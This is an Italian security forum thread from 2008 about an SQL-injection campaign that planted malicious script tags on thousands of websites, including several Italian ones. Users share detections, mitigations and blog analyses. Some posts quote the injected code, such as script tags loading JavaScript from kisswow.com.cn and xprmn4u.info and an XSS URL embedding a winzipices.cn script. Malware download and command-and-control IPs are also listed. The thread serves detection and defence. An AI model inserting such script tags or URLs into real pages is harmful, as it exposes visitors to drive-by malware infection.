8 maggio 2008 alle 17.52

di netquik ([email protected])


Il SANS Internet Storm Center (ISC) ha segnalato (http://isc.sans.org/diary.html?storyid=4393) la diffusione di un worm di SQL Injection che ha colpito circa 4.000 siti web a partire da metà Aprile.
Come per i recenti attacchi di questo tipo identificati in rete, questa minaccia si diffonde attaccando i database web ed iniettando nelle pagine alcuni script e iframe che conducono a risorse nocive.
Secondo ISC, le successive infezioni dei computer dei visitatori dei siti compromessi vengono condotte sfruttando alcune vulnerabilità di RealPlayer.

Il codice script iniettato dai cybercriminali fa rifermento al dominio winzipices.cn, dal quale vengono poi eseguiti gli exploit che coinvolgono anche i domini cnzz.com e 51.la. Eseguendo una ricerca di questi domini tramite Google è possibile avere una lista dei siti web compromessi dal presunto worm.

Se un sito web è stato compromesso tramite SQL Injection presenterà nella sorgente HTML uno script caricato dal dominio winzipices.cn e normalmente chiamato 5.js (ma anche 1, 2, 3 e 4.js). Questi file JavaScript includono un iframe nascosto che punta ad una pagina ASP ospitata sempre dallo stesso dominio. Questo codice server side include a sua volta due IFRAME nascosti, e un ulteriore file JavaScript che esegue un verifica del browser utilizzato (IE6 o IE7) prima di caricare una immagine nociva nel tentativo di sfruttare il browser come vettore per bucare alcune vulnerabilità in RealPlayer. Come riportato da un'analisi dettagliata pubblicata su Shadowserver (http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080507), sembra che l'esecuzione dell'exploit porti al download di una file chiamato "test.exe" da 61.188.38.158. Si tratta dello stesso nome file utilizzato in altri recenti attacchi che coinvolgevano il dominio nihaorr1.com, ma di codici binari molto differenti.

Il nuovo file nocivo sembra fare parte di un kit già visto in occasione di infezioni condotte da malware di origine cinese. Prima di tutto il malware si occupa di scaricare un file di configurazione. Questo file include diversi comandi che vengono inviati al sistema, tra cui il download di un altro file nocivo (1.exe) e la restituzione di informazioni ad un'altro URL. Secondo l'analisi attuale sembra che questo tipo di malware sia in grado di eseguire una tecnica di ARP spoofing per iniettare codice nocivo nelle pagine web degli utenti nella LAN. Il file 1.exe esegue inoltre continue richieste in uscita all'indirizzo 61.134.37.15 sulla porta 1800.

Come sempre in caso di minacce del genere, gli amministratori di rete sono incoraggiati a bloccare l'accesso a domini e siti coinvolti nell'outbreak, oltre che ad assicurarsi di aver installato tutte le ultime patch di protezione per i software utilizzati. I siti e indirizzi IP attualmente coinvolti in questo attacco includono: winzipices.cn [60.191.239.229], 61.188.38.158 e61.134.37.15.


IMPORTANTE: Non visitate i domini e gli IP a cui si fa riferimento in questo articolo, o qualsiasi altro sito web restituito come risultato di una ricerca di siti che includono questi indirizzi (incluse le versioni in cache). Facendo ciò infatti il rischio di subire una infezione da malware è molto alto.

Fonte: Tweakness.net (http://www.tweakness.net/topic.php?id=4518)


PS: personalmente ho provato a verificare questa notizia, ma sembra che il dominio in questione (winzipices.cn) sia stato "ripulito" o cmq nn è piu attivo, per cui i siti in questione risultano, almeno mi sembra, puliti

chiedo conferma ai piu esperti

Mi pare che winzipices.cn sia ancora ben attivo e precisamente al link winzipices.cn/3.asp
Ci sono 3 iframe e codice exploit tuttora funzionante
Ad esempio, per rimanere su siti con dominio .IT c'e' www(dot).bottegafiorentina(dot)it che al mometo ha lo script 3.js che linka appunto al sito cinese, ma facendo un po di ricerche presumibilmente ne salteranno fuori altri

Edgar :D

PS lo script pericoloso non sta' sulla homepage ma in una pagina interna del sito.

Visto che questo trend continua ed anzi si amplifica non sarebbe il caso di consigliare agli utenti di adottare qualche precauzione aggiuntiva, rispetto alle solite, quando navigano ed aprono pagine di ricerca di siti non noti ?

Faccio un esempio velocissimo.
Se apro HW adotto le solite protezioni.
Se faccio una ricerca su google ed apro un sito che non ho mai aperto uso proteggermi in più, che sò, ad esempio con un sistema di virtualizzazione ?

A mio parere usando Firefox con l'addon NOSCRIPT attivo si riduce di una buona percentuale il rischio di beccarsi uno script pericoloso.
Se poi si esgue il browser (qualunque browser non solo Firefox) in Sandboxie la sicurezza aumenta ulteriormente.
Da prove fatte visitando siti pericolosi posso dire che in quasi un anno di utilizzo l'accopiata Firefox con Noscript e Sandboxie ha dimostrato di bloccare il 99% delle delle minacce, anche nuove, che possono derivare da un sito con problemi malware.
Edgar :D

Mi pare che winzipices.cn sia ancora ben attivo e precisamente al link winzipices.cn/3.asp
Ci sono 3 iframe e codice exploit tuttora funzionante
Ad esempio, per rimanere su siti con dominio .IT c'e' www(dot).bottegafiorentina(dot)it che al mometo ha lo script 3.js che linka appunto al sito cinese, ma facendo un po di ricerche presumibilmente ne salteranno fuori altri

Edgar :D

mi fa piacere leggerti, ti stimo molto :)

io da neofita ho messo (ovviamente sandboxato) in google il dominio winzipices.cn e ho controllato lo script dei primi 3 siti che da come risultato e ho cercato qualke script o iframe come spiegato nell'articolo...ma nn li ho visti... io uso firebug....mi son messo a spulciarli...ma nada... :( :mc:

A mio parere usando Firefox con l'addon NOSCRIPT attivo si riduce di una buona percentuale il rischio di beccarsi uno script pericoloso.
Se poi si esgue il browser (qualunque browser non solo Firefox) in Sandboxie la sicurezza aumenta ulteriormente.
Da prove fatte visitando siti pericolosi posso dire che in quasi un anno di utilizzo l'accopiata Firefox con Noscript e Sandboxie ha dimostrato di bloccare il 99% delle delle minacce, anche nuove, che possono derivare da un sito con problemi malware.
Edgar :D

Quindi mi immagino quale sarebbe la proprorzione usando Opera.....:D :D
Non farci caso lo sanno tutti che io ed Opera siamo un tutt'uno !! :D

Perchè un giorno che hai tempo e voglia, non butti giù una specie di relazione,vista la tua esperienza sul campo a tal proposito, su questo tema ?

Ad esempio io sarei moltissimissimo interessato a quel 1% che non rientra nella tua percentuale !! ;)

Al momento e per quel che sò vengono sfruttate le seguenti vulnerabilità:

MDAC
RealPlayer

che si appoggiano su controlli Active X quindi come sottolineava Edgar è bene usare FF o Opera ed evitare IE come la peste. Altra cosa importante è tenere i software complementari aggiornati, certo che con RealPlayer risulta difficile :D

Al momento e per quel che sò vengono sfruttate le seguenti vulnerabilità:

MDAC
RealPlayer

che si appoggiano su controlli Active X quindi come sottolineava Edgar è bene usare FF o Opera ed evitare IE come la peste. Altra cosa importante è tenere i software complementari aggiornati, certo che con RealPlayer risulta difficile :D

Hai ragione anche la versione 11 è classificata HG da Secunia.
Anzi è pure più sicura la versione 10......sembrerebbe !!
Comunque a me non tocca.....io non uso RP !!

.mi son messo a spulciarli...ma nada...

Uno script che punta al sito cinese io lo vedo se apro questo link

http://www(dot)bottegafiorentina(dot)it/Bottega+Club%3Cscript+src=%22http:%2F%2Fwinzipices.cn%2F3.js%22%3E%3C%2Fscript%3E/men-products-en-EUR--.htm


Occhio che e' ancora attivo e se aprii il link in senza le dovute precauzioni c'e' la reale possibilita di avere problemi malware sul pc.

Edgar :D

Quindi mi immagino quale sarebbe la proprorzione usando Opera.....:D :D
......................................
Ad esempio io sarei moltissimissimo interessato a quel 1% che non rientra nella tua percentuale !! ;)


A dire il vero in circa un anno di uso Firefox-Noscript-Sandboxie non ho mai avuto problemi quindi sarei al 100% di affidabilita' ma pur visitando siti malware di tutti i tipi ho sempre usato una certa cautela sapendo di cosa si trattava. Presumo che un utente all'oscuro del pericolo avrebbe magari cliccato su qualche eseguibile e non so come sarebbe finita anche avendo la protezione di Sandboxie e Noscript attiva. E poi, come ben sappiamo, esistono sempre nuovi maware che cercano di bypassare le protezioni al momento funzionanti.Quindi la sicurezza al 100% direi che non esiste.


Edgar :D

...

ragione hai.....:muro:

è questione di vista e sopratutto di tempo....già che io sono miope.....di tempo ne ne ho mai....:D

ste cose le devo fare con calma e con tempo libero :sofico:

Uno script che punta al sito cinese io lo vedo se apro questo link

http://www(dot)bottegafiorentina(dot)it/Bottega+Club%3Cscript+src=%22http:%2F%2Fwinzipices.cn%2F3.js%22%3E%3C%2Fscript%3E/men-products-en-EUR--.htm


Occhio che e' ancora attivo e se aprii il link in senza le dovute precauzioni c'e' la reale possibilita di avere problemi malware sul pc.

Edgar :D

Ho analizzato meglio il caso dei links forniti dal motore di ricerca e mi pare che sia questa volta non ci siano in realta script sui siti indicizzati ....

Questo il testo con immagini sul blog:

Una precisazione al riguardo della presenza di script java su alcuni pagine risultato di ricerca

Una ricerca in rete del termine winzipices, che denota un recente attacco subito da migliaia di siti in tutto il mondo e che redirige su server cinese contenente exploit, porta a questi risultati relativamente a dominio .it

Cliccando su questi links abbiamo il caricamento di una pagina web che, ad esempio, porta al seguente codice.

Queste due schermate evidenziano la presenza nella pagina web del codice java con i riferimenti al sito cinese che hosta malware sotto forma di exploit.

La prima cosa che viene da pensare e' che il sito .it in questione abbia al momento pagine con codici pericolosi inseriti al loro interno

In realta' non e' cosi' , almeno per i links riportati dal motore di ricerca.
Vediamo perche'

Se esaminiamo in dettaglio il link fornito dal motore di ricerca abbiamo questa stringa

dove potete notare, in giallo la presenza per intero del codice dello script a parte ad esempio i caratteri “/” che sono sostituiti dal corrispondente codice numerico .

In pratica richiamando il sito attraverso questa stringa, questo ci ritorna una pagina con codice che corrisponde a quello visto sopra e che presenta all'interno i frammenti di javascript pericoloso.
E' stata quindi, come si vede, sfruttata la possibilita' di inserire all'interno del codice della pagina che visualizziamo, uno script java che in realta' non e' presente originariamente ma il cui codice viene passato dal browser quando interroga il sito come succede nei piu' normali casi di XSS

Per fare una controprova passiamo al browser questa diversa stringa che e' modificata solo nel nome del sito e del file linkato dallo script passati dal browser. (colore arancio)


Il risultato, interrogando il sito e' una pagina che porta al suo interno, scripts totalmente diversi dagli originari trovati prima e che corrispondono al codice inserito nella stringa (colore arancio)


Se inoltre proviamo a vedere con l'addon Web Developper Toolbar di Firefox abbiamo l'ulteriore conferma che viene caricato una script creato per prova e hostato su una pagina di test in Googlepages.

Si vede in questo caso come l'uso di un motore di ricerca che ha indicizzato links cosi' costituiti possa portare ad avere risultati alquanto insoliti ma anche pericolosi se gli script inseriti dovessero essere attivi.
In effetti la presenza di uno script nelle linee di codice T I T L E e M E T A della pagina non dovrebbe portare all'eseczione degli stessi ma pare che , come riporta trend micro nel suo blog:

“.. While neither t a g s are supposed to support , some browsers are prone to syntax errors. They interpret any script tags wherever they are placed. ....”

confermando che potrebbe esserci in alcuni casi una esecuzione dello script e reindirizzamento su sito malware.

http://edetools.blogspot.com/2008/05/una-precisazione-al-riguardo-della.html


Edgar :D

Sul sito tg2[dot]rai[dot]it c'è uno script che punta a kisswow[dot]com[dot]cn

Sta succededendo qualcosa di strano perche' se entro su rai tg2 da explorer mi manda in ovewflow il pc virtutuale
se entro in firefox prima c'era uno script adesso ce ne sono una decina .!!!!!!!!!
boh
posto lo screen sul blog

edgar :D

Stò facendo ulteriori controlli, infatti gli script stanno uscendo come i funghi, mi sembra di giocare a campo minato :D

comune[dot]grugliasco[dot]to[dot]it

tra l'altro non so se succede solo a me ma le pagine hanno il layout completamente rovinato ... vedi screen sul blog

http://edetools.blogspot.com/2008/05/sito-rai-tg2-sotto-attacco.html

:D

edgar

Sta succededendo qualcosa di strano perche' se entro su rai tg2 da explorer mi manda in ovewflow il pc virtutuale
se entro in firefox prima c'era uno script adesso ce ne sono una decina .!!!!!!!!!
boh
posto lo screen sul blog

edgar :D

il mio peerguardian mi blocca (HTTP) l'accesso al sito tg2....

mi blocca questo indirizzo ip: 212.162.84.110

leggendo lo script, mi sembra che c sia questo indirizzo:
www[dot]kisswow[dot]com

l'indirizzo ip di questo sito (208.87.149.150 ) è però diverso da quello bloccato da peerguardian...

dovrebe essere un sito porno, almeno cosi mi dice finjan

facendo una ricerca su google, mi da diversi risultati, con siti che contengono nello script questo sito, tra cui il Comune di Grugliasco :D

ps: cmq succede anche a me quello che succede a te visitando il sito del tg2....stesse identiche cose

Interessante vedere come l'attacco sia estremamente "sporco". Dal sorgente della pagina sembra che i tag inseriti vengano spesso sovrascritti:

<li class="notizia_bg_grigio"><a href="/default.asp?id_n=3655&id_c=17">Pappagalli in libertà<script s<script src=http://www.kisswow.com.cn/m.js></script></a></li>

<li ><a href="/default.asp?id_n=3542&id_c=17">I segreti della Tour Eiffel<sc<script src=http://www.kisswow.com.cn/m.js></script></a></li>

Credo sia a causa di questa imprecisione se il layout del sito è così evidentemente stravolto.

Comunque ne hanno 'scaricato una bella quantita' di scripts per ogni singolo sito

ad esempio sul Comune di Grugliaso ci sono 121 scripts !!!

Ho esaminato i siti hostati sullo stesso ip del comune, un centinaio ma sono tutti puliti, almeno al momento.

Edgar :D

"nuove" info dal blog di f-secure:
http://www.f-secure.com/weblog/

ariel.ctu.unimi.it/corsi link (http://whois.domaintools.com/unimi.it)...quelll'1% saranno tutti studenti in erasmus?:asd:

I sotto elencati siti .it puntano a xprmn4u[dot]info

namb[dot]it
noris-audio-video[dot]it

felixia[dot]it punta a nihaorr1[dot]com

potresti indicarmi la porzione di codice infetto?

in namb[dot]it lo script si trova in title:

<title>N.A.M.B. FORUM<script src="http://xprmn4u.info/f.js"></script> ~ Cerca</title>

c'è pure un forum credo svizzero su eric clapton infetto:
www[dot]ericclapton[dot]ch/forum/index.php

da notare che in questo caso, google avverte che il sito è infetto...(sono a pagina 10 della ricerca della parola xprmn4u.info)

Al momento e per quel che sò vengono sfruttate le seguenti vulnerabilità:

MDAC
RealPlayer

che si appoggiano su controlli Active X quindi come sottolineava Edgar è bene usare FF o Opera ed evitare IE come la peste. Altra cosa importante è tenere i software complementari aggiornati, certo che con RealPlayer risulta difficile :D

per mdac confermo
ho provato a consentire l'active x e avira webguard se li cazzia tutti :D

Ho aggiunto sul blog una breve analisi dello script con la decodifica che punta al sito cinese contenente gli exploits

http://edetools.blogspot.com/2008/05/una-breve-analisi-dello-script-presnte.html


Edgar :D

il mio peerguardian mi blocca (HTTP) l'accesso al sito tg2 ... leggendo lo script, mi sembra che c sia questo indirizzo: www[dot]kisswow[dot]com ... dovrebe essere un sito porno, almeno cosi mi dice finjan..
E poi dicono che il TG2 è noioso :D

Comunque, ho l'impressione che punti anche ad altri indirizzi.

E poi dicono che il TG2 è noioso :D

Comunque, ho l'impressione che punti anche ad altri indirizzi.

E' stato ripulito

Ho aggiunto sul blog una breve analisi dello script con la decodifica che punta al sito cinese contenente gli exploits

http://edetools.blogspot.com/2008/05/una-breve-analisi-dello-script-presnte.html


Edgar :D

Ottimo Edgar, perchè non metti il blog in firma ;)

per mdac confermo
ho provato a consentire l'active x e avira webguard se li cazzia tutti :D

:D

comunque edgar,se ti consola pure a me è andata in errore la macchina virtuale mentre creava file su file sotto sytem32/catroot :D

E' stato ripulito
Grazie per l'info :)

Grazie per l'info :)

Prego